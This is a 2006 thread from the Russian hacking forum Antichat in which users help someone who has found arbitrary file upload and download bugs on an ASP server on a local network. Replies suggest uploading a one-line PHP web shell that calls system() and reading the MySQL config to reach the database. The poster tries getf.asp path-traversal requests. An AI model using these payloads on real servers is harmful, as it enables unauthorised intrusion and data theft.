ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

include-
  #1  
Старый 03.06.2006, 06:41
Аватар для en4cer
en4cer
Познающий
Регистрация: 10.02.2006
Сообщений: 88
Провел на форуме:
574349

Репутация: 8
Отправить сообщение для en4cer с помощью ICQ
По умолчанию include-

Народ такая трабла:
локалке сервачок на asp
Нашлись там баги:
Я могу заливать произваольные файлы, но запустить их не как не могу все что я загрузил загружается в каталог "D:\up\1\" и так-же есть возможность скачивать произвольные файлы, тока вот у меня нет путей
может подскажете мне что мона :. заюзать дабы продвинутся дальше?
 
Ответить с цитированием

  #2  
Старый 03.06.2006, 11:41
Аватар для temon
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
Провел на форуме:
172723

Репутация: 5
По умолчанию

Может порокатит, если залить php файл следующего содеражания:

<?
system($z);
?>
А там потом уже стандартными командами смотреть дирикториии и пути.
ИлИ щелл может залить?
 
Ответить с цитированием

  #3  
Старый 03.06.2006, 12:11
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Посмотри конфиг файл с подключением к мускулу. Залей туда скрипт от rst, Чтоыб зайти в базу. А если с заливкой проблемы скачай сорцы скрипта, с помощью которого заливаешь файлы. И посмотри в исходники куда идёт путь закачки.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #4  
Старый 03.06.2006, 15:02
Аватар для en4cer
en4cer
Познающий
Регистрация: 10.02.2006
Сообщений: 88
Провел на форуме:
574349

Репутация: 8
Отправить сообщение для en4cer с помощью ICQ
По умолчанию

БлиН, трабла в том то запустить залитый мной файл не могу тока скачать обратно.
После заливки файла у меня есть ссылки на скачку обратно getf.asp?F=D:\up\1\+file+
Пробывал загрутить сам файл getf.asp?F=./getf.asp &&
getf.asp?F=index.asp нифига не проходит. Дабы убидится что работает попробывал скачать getf.asp?F=C:\Program Files\Internet Explorer\iexplore.exe получилось. Но блин...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Безопасное использование include EST a1ien PHP, PERL, MySQL, JavaScript 19 15.05.2006 14:26
Что такое Include и с чем его едят? Упырдла PHP, PERL, MySQL, JavaScript 9 06.02.2006 20:31
Как обойти защиту в PHP: include (...) ? BNF PHP, PERL, MySQL, JavaScript 5 19.05.2005 18:27
применение include в php-скриптах в своих целях YooogI Чужие Статьи 0 06.02.2005 19:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ